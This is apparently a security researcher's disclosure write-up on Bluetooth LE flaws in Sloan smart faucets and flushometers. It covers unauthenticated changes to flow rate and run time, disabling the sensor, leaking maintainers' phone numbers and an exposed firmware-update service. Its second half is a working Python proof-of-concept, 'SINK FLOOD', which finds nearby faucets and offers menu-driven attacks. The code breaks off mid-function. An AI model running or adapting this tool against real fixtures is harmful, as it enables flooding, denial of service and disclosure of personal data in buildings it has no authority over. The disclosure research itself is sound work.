Since this is implemented in the app, I’ll bet the faucet has a much wider range. Of course, flow rate is governed by whatever the line in can support (I’m not a plumber). Flow rate is governed by d0aba888-fb10–4dc9–9b17-bdd8f490c949 characteristic.

Flow Rate Value

It seems floats are written to the characteristic as two characters, in this case, 1 and 9 (1.9), which is one of the liters per minute (LPM) options. Let’s see what we can set it to.

So, we can’t set it to a 3 byte value, but we can set it to 0x3939 (9.9), and that seems to be the highest value to have any effect. Of note, we can also set it to even higher values like 0xFF39, and while that doesn’t seem to do anything, it still feels like a value that shouldn’t be allowed by logic on the device. Since I don’t have the faucet hooked up, I can’t test what happens when we set the flow rate really high (again, not a plumber). When it’s set to FF39, the app tries to display it as 0.0. And, we can set it to 9.9 via the app. So, Unless we plug this thing into a water line, we’re not gonna know what happens with the FF39.

Activation Mode

“Activation Mode” controls how long water flows for when the IR sensor is triggered. We can set it up to 120 seconds via the app. We’re all washing our hands a lot longer during covid, but I know I can sing happy birthday to myself 2 or three times and still be under that 2 minute mark. Can we set it higher and cause the faucet to flow for a really long time?

There are two types of Activation Mode: Metered and On Demand. What’s the difference between them? Surely the internet will tell me.

A Google Play Store comment indicating confusion on Metered and On Demand flow rate

Nope, no luck there. There are a few variable definitions that may give us a clue. Could that On Demand value be a mistake, off by an order of magnitude?

public final class ActivationModeFragmentKt {
    private static final int METERED_MAX_VALUE = 120;
    public static final int METERED_MODE = 1;
    private static final int MIN_VALUE = 3;
    private static final int ON_DEMAND_MAX_VALUE = 1200;
    public static final int ON_DEMAND_MODE = 0;
}

Unfortunately those safeguards don’t seem to be set anywhere else. Let’s see if we can find the code that controls this. Two different characteristics control the run times for the different modes.

public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME = “d0aba888-fb10–4dc9–9b17-bdd8f490c945”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME = “d0aba888-fb10–4dc9–9b17-bdd8f490c944”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION = “d0aba888-fb10–4dc9–9b17-bdd8f490c943”;
Flow Rate characteristics and values

And we can see how these are set on the device. I’m going to go ahead and assume that everything on this device is written as ascii. So, Mode is set to 0x30 == “0”, which we can see is ON_DEMAND_MODE. And then the Metered Run Time is set to 120 seconds, and On Demand is set to 30 seconds. Cool. Let’s see how high we can go. This is going to be painful, waiting for many minutes for this thing to turn back off.

The On Demand characteristic set to 1130 seconds

Ok, we’ve set the On Demand time to 1130 seconds, so, about 18 minutes. I wave my hand in front of the faucet’s IR sensor, and grab a cup of coffee. This is gonna take a while…. That didn’t work. It shut off quickly. There must be some internal idea of how long is too long. I’ll flip the mode to metered and set that pretty high. Seems metered won’t take more than 3 bytes, so I’ll set the first one to 9 for 920 seconds, or ~15 minutes. And then I’ll wait.

Metered Mode set to 920 seconds

It’s still going. There’s gotta be a better way to test. Currently, I wave my hand in front of the sensor once to engage the faucet, and then try periodically over the timer duration. It won’t make the click of engagement until the time is up. So, the next time I can wave my hand in front of the sensor and hear a click, I know the faucet’s timer has ended. This won’t be incredibly accurate or scientific. I set a 14 min timer and walked away. Annnnd somehow I walked right back in at the 15 minute mark and heard it click off. So, the highest value we can likely set for Metered mode is 999, which is 16.65 minutes. That’s a long time to leave the tap on. I wonder who would want to do something like that…

Wet Bandits — Be on the lookout — These criminals are armed and clumsy

DoS

In addition to causing a flood, we can trigger the opposite effect. It’s possible to disable the faucet’s sensor completely by setting the Sensor Range to 0. Now, the faucet won’t turn on no matter how close our hand gets or how vigorously we wave. In this case, we can simply send an 0x30 to UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE.

Model and Version

It’s also possible to read the model and version number via these characteristics. Nothing super exciting here, but could be useful if we were trying to find a specific version. Most BLE enabled devices will expose these via the “Device Information” service. These are separate from that and something Sloan must have thought necessary.

Firmware & Hardware
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_FIRMWARE_VERSION = “d0aba888-fb10–4dc9–9b17-bdd8f490c906”;
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_HARDWARE_VERSION = “d0aba888-fb10–4dc9–9b17-bdd8f490c905”;

Firmware: 0109

Hardware: 0175

Logged Phone Numbers

The “security” mode of the faucet logs the phone number stored in the app for certain events.

public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_BD_NOTE_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c932”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_INTERVAL_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c930”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_ON_OFF_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92e”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_TIME_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92f”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET = “d0aba888-fb10–4dc9–9b17-bdd8f490c929”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_OD_OR_M_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92b”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92a”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_METER_RUNTIME_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92c”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_OD_RUNTIME_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92d”;
Phone numbers stored on faucet

I’ve conveniently set these to the Tenable support number 855–267–7044. In a real setup, this would be the phone number registered in the app that performed each specific task update. I attempted to see how wide the field was, and got up to 15 characters before it wouldn’t take any more.

It doesn’t seem like the app is parsing anything in the text fields, so no XSS that I can find.

The other interesting thing here is that any time someone makes a change to the faucet, the app causes their phone number to be stored on the faucet. This is then reflected back to any app that connects OR anyone that reads the characteristic. This isn’t mentioned in the app and I don’t see a privacy policy. Does GDPR apply to bathroom fixtures?

Aquis Dongle

What is Aquis? I don’t know. But there are several characteristics in the app for an Aquis Dongle. Could this be a new product line? A partnership with another company that this app will work with?

public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_FIRMWARE_VERSION = “d0aba888-fb10–4dc9–9b17-bdd8f490c90e”;
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_HARDWARE_VERSION = “d0aba888-fb10–4dc9–9b17-bdd8f490c90d”;
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_MANUFACTURING_DATE = “d0aba888-fb10–4dc9–9b17-bdd8f490c90c”;
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SERIAL = “d0aba888-fb10–4dc9–9b17-bdd8f490c90b”;
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU = “d0aba888-fb10–4dc9–9b17-bdd8f490c90F”;

There does seem to be a company called Aquis that offers connected faucets. Perhaps they’re one of Sloan’s partners or produced the tech for Sloan.

Aquis Multifunctional Faucet feature sheet

That ‘optional service APP’ sounds just like what we’re looking at.

OTA Firmware Update

The service UUID 1d14d6ee-fd63–4fa1-bfa4–8f47b42119f0 maps to the variable name UUID_SERVICE_OTA in our variable definitions file. Indeed, a quick search reveals this to be Silicon Labs OTA service, giving us insight, also, into the chipset used here. We’ll have to dig into this.

OTA means “Over-The-Air” and is the method to write firmware to various BLE chipsets. As far as I can tell, the different major chipset manufacturers each have their own OTA spec, and they are not interoperable even if they’re called the same thing. Therefore it can be helpful to have chipset specific tools to manipulate OTA. There are often various levels of security that can be added by the developer, including checking firmware signatures or not.

Silicon Labs Gecko bootloader has 3 optional settings for secure firmware update:

  • Require signed firmware upgrade files.
  • Require encrypted firmware upgrade files.
  • Enable secure boot.

Silicon Labs defines these as:

  • Secure Boot refers to the verification of the authenticity of the application image in main flash on every boot of the device.
  • Secure Firmware Upgrade refers to the verification of the authenticity of an upgrade image before performing a bootload, and optionally enforcing that upgrade images are encrypted.

If none of those are selected by the developer, it’s possible to write any firmware to the device. As the faucet was quite expensive, I did not test firmware update and am merely pointing out that it’s exposed.

Using one of the SILabs android apps, we can quickly see that it’s possible to do an OTA firmware update. No telling what the firmware in place is checking for. I don’t want to break this thing yet.

I also grepped through the android apk but don’t see anything that references the three OTA variable names. I guess they’ll implement updates in the future. This makes me think that the OTA feature uses stock code from the SDK.

Hardware — BLE Adapters

These vulns should be exploitable via any BLE adapter, but since hardware can be finicky, the specific adapters I tested with are:

Cyberkinetic Effects or Why should I even care

Sure, turning on the water might not be the next million dollar ransomware campaign, and flushing the toilets remotely seems like a great prank, but not much more. Still, there can be real interesting effects. First off, these faucets aren’t usually for home use, but installed in office buildings, in groups. Turning on all of the faucets repeatedly or flushing all of the toilets could possibly cause a flooding condition. Move over SYN flood, this is a sink flood.

But these devices aren’t networked! They have no IP! They’re limited by range! These are great points. However, the faucet likely has a 30 foot BLE range. This is well within range of some miscreant standing at their local donut shop near the office. A neighboring unit in a condo or apartment building would also be well within range. Also, most laptops and desktops include bluetooth adapters, so any malware infection is a potential vector. I always like to point out that a BLE device is only a hop away from any modern laptop.

Findings

Enable Water Dispense > Kinetic Effect, Change Flow Rate > Kinetic Effect, Change Activation Mode / Time > Kinetic Effect / DoS, Change Sensor Range to 0 > DoS, Maintenance Person Cell Phone Number Modification and Disclosure > Information Leakage, Enable Toilet Flush > Kinetic Effect, Model Number is writable > Modification of Assumed Immutable Data

PoC || GTFlow

Here’s a quick proof of concept in case you’ve got an unpatched faucet or flushometer lying around. As of this posting, Sloan has not responded to our disclosure emails and to our knowledge has not released an update.

from bluepy.btle import Scanner, DefaultDelegate, Peripheral, UUID, BTLEDisconnectError, BTLEGattError, BTLEManagementError, BTLEInternalError
SCAN_TIMEOUT = 2.0
DEBUG = 0
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c965")
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLOW_RATE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c949")
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c945");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c944");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c943");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c942");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_FIRMWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c906");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_HARDWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c905");
UUID_CHARACTERISTIC_FAUCET_BD_DEVICE_INFO_MODEL_NUMBER = UUID("00002a24-0000-1000-8000-00805f9b34fb");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_BD_NOTE_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c932");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_INTERVAL_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c930");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_ON_OFF_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92e");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_TIME_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92f");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c929");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_OD_OR_M_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92b");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92a");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_METER_RUNTIME_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92c");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_OD_RUNTIME_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92d");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_FLUSHER_NOTE_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88338");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_ACTIVATION_TIME_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88337");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_DIAGNOSTIC = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88335");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88331");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FIRMWARE_UPDATE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88336");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FLUSH_VOLUME_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88334");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_LINE_SENTINAL_FLUSH_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88333");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88332");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_FIRMWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90e");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_HARDWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90d");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_MANUFACTURING_DATE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90c");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SERIAL = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90b");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90F");
AQUIS_UUIDS = (
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_FIRMWARE_VERSION,
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_HARDWARE_VERSION,
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_MANUFACTURING_DATE,
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SERIAL,
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU
)
UUID_CHARACTERISTIC_APP_IDENTIFICATION_LOCK_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c953");
UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c954");
UUID_CHARACTERISTIC_APP_IDENTIFICATION_TIMESTAMP = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c951");
UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c952");
LOCK_INFO = (
UUID_CHARACTERISTIC_APP_IDENTIFICATION_LOCK_STATUS,
UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE,
UUID_CHARACTERISTIC_APP_IDENTIFICATION_TIMESTAMP,
UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY,
)
FAUCET_PHONE_UUIDS = (
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_BD_NOTE_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_INTERVAL_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_ON_OFF_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_TIME_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_OD_OR_M_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_METER_RUNTIME_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_OD_RUNTIME_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_FLUSHER_NOTE_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_ACTIVATION_TIME_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_DIAGNOSTIC,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FIRMWARE_UPDATE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FLUSH_VOLUME_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_LINE_SENTINAL_FLUSH_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE,

)
UUID_CHARACTERISTIC_OTA_CONTROL = UUID("f7bf3564-fb6d-4e53-88a4-5e37e0326063");
UUID_CHARACTERISTIC_OTA_DATA_TRANSFER = UUID("984227f3-34fc-4045-a5d0-2c581f81a153");
OTA = (
UUID_CHARACTERISTIC_OTA_CONTROL,
UUID_CHARACTERISTIC_OTA_DATA_TRANSFER,
)
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_1 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94a");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_2 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94b");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_3 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94c");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_4 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94d");
NOTES = (
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_1,
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_2,
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_3,
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_4,
)
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_COMMUNICATION_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c969");
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_SOLAR_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c968");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c966");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_DATE_OF_DIAGNOSTIC = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c967");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_INIT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c961");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_SENSOR_RESULT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c962");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_TURBINE_RESULT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c964");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_VALVE_RESULT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c963");
DIAG = (
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_DATE_OF_DIAGNOSTIC,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_INIT,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_SENSOR_RESULT,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_TURBINE_RESULT,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_VALVE_RESULT,
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_COMMUNICATION_STATUS,
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_SOLAR_STATUS,
)
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88361");
UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_PRODUCTION_ENABLE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c971");
UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_ADAPTIVE_SENSING_ENABLE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c978");
UUID_CHARACTERISTIC_BATTERY_LEVEL = UUID("00002a19-0000-1000-8000-00805f9b34fb");
UUID_CHARACTERISTIC_FAUCET_BD_BATTERY_LEVEL = UUID("00002a19-0000-1000-8000-00805f9b34fb");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c966");
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_BATTERY_LEVEL_AT_DIAGNOSTIC = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88364");
BATTERY_INFO = (
UUID_CHARACTERISTIC_BATTERY_LEVEL,
UUID_CHARACTERISTIC_FAUCET_BD_BATTERY_LEVEL,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC,
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_BATTERY_LEVEL_AT_DIAGNOSTIC,
)
ATTACKS_DICT = {
"0": ("Dispense Water", UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE, "Enter a 1 to begin Dispensing water: "),
"1": ("Flush Toilet", UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE, "Enter a 1 to begin flushing diagnostic: "),
"2": ("Change Faucet Flow Rate", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLOW_RATE, "Enter two digits together, they'll be a float (11 will be 1.1lpm): "),
"3": ("Change Faucet Activation Mode", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION, "Enter a 0 (ondemand) or a 1 (metered) to change the activation mode.: "),
"4": ("Change Faucet OnDemand Run Time", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME, "Enter 2 digits (10 = 10 seconds): "),
"5": ("Change Faucet Metered Run Time", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME, "Enter 3 digits (120 = 120 seconds): "),
"6": ("Change Sensor Range", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE, "Enter 1 digit (0 to disable sensor): "),
"7": ("Read Maintenance Personnel Info", FAUCET_PHONE_UUIDS, "N/A"),
"8": ("Change Model Number", UUID_CHARACTERISTIC_FAUCET_BD_DEVICE_INFO_MODEL_NUMBER, "Enter a new model number: "),
"9": ("OTA (doesn't write)", OTA, "N/A"),
"10": ("Read HW", UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_HARDWARE_VERSION, "N/A"),
"11": ("Read FW", UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_FIRMWARE_VERSION, "N/A"),
"12": ("Read AQUIS Info", AQUIS_UUIDS, "N/A"),
"13": ("Read Locking Information", LOCK_INFO, "N/A"),
"14": ("Read Diagnostic Info", DIAG, "N/A"),
"15": ("Read NOTES", NOTES, "N/A"),
"16": ("Write NOTES", NOTES, "Enter something to write to the 4 notes fields:"),
"17": ("Production Enable", UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_PRODUCTION_ENABLE, "Write something to production enable: "),
"18": ("Adaptive Sensing Enable (gain/sensitivity changes not implemented)", UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_ADAPTIVE_SENSING_ENABLE, "Write to Adaptive Sensing Enable: "),
"19": ("Read Battery Info", BATTERY_INFO, "N/A"),
}
class ScanDelegate(DefaultDelegate):
def __init__(self):
DefaultDelegate.__init__(self)
#def handleDiscovery(self, dev):
#if dev
def convert_num_for_writing(text):
if len(text) > 4:
return text.encode()
output = b''
#for letter in text:
# output = output + str(hex(ord(letter)))[2:4].encode()
output = text.encode()
return output
def run_sink_flood(attack, target, p):
attack_name = attack[0]
uuid = attack[1]
text = attack[2]
target_name = target["name"]
if type(uuid) == UUID:
char = p.getCharacteristics(uuid=uuid)
if char[0].supportsRead() and attack_name != "Dispense Water":
val = char[0].read()
print(f"[ >] {target_name} responds with current value: {val}")
if not text == "N/A":
sendme = input(text)
sendme = convert_num_for_writing(sendme)
char[0].write(sendme, withResponse=True)
else:
for i in uuid:
try:
char = p.getCharacteristics(uuid=i)
if char[0].supportsRead():
val = char[0].read()
print(f"[ >] {target_name} responds with current value: {val}")
if not text == "N/A":
sendme = input(text)
sendme = convert_num_for_writing(sendme)
char[0].write(sendme, withResponse=True)
except BTLEGattError:
pass
def menu_pick_attack(target):
for attack in ATTACKS_DICT.keys():
print(f"[{attack}] {ATTACKS_DICT[attack][0]}")
selection = input("Enter a #: ")
return ATTACKS_DICT[selection]
def menu_pick_device(devices):
menu = {}
i = 1
target = None
for dev in devices:
for (adtype, desc, value) in dev.getScanData():
if desc == "Complete Local Name":
if type(value) == str and "FAUCET" in value:
menu["%s" % i] = {"name": value,"dev": dev}
i += 1
options = menu.keys()
if not options:
return None
sorted(options)
for entry in options:
print(f"[{entry}] {menu[entry]['dev'].addr} {menu[entry]['name']} ")
selection = input("Enter a device #: ")
if selection in menu.keys():
target = menu[selection]
return target
def lescan():
scanner = Scanner(1).withDelegate(ScanDelegate())
try:
print(f"[*] scanning for {SCAN_TIMEOUT}")
devices = scanner.scan(SCAN_TIMEOUT)
except BTLEManagementError:
print("[*] Permission to use HCI unavailable, rerun with sudo or as root.")
return
return devices
def main():
print("[*] starting SINK FLOOD Sloan SmartFaucet and SmartFlushometer tool")
while True:
found_devices = lescan()
if found_devices:
target = menu_pick_device(found_devices)
if not target:
continue
p = Peripheral(target['dev'].addr)
#p = Peripheral('08:6b:d7:20:9d:4b')
while target:
attack = menu_pick_attack(target)
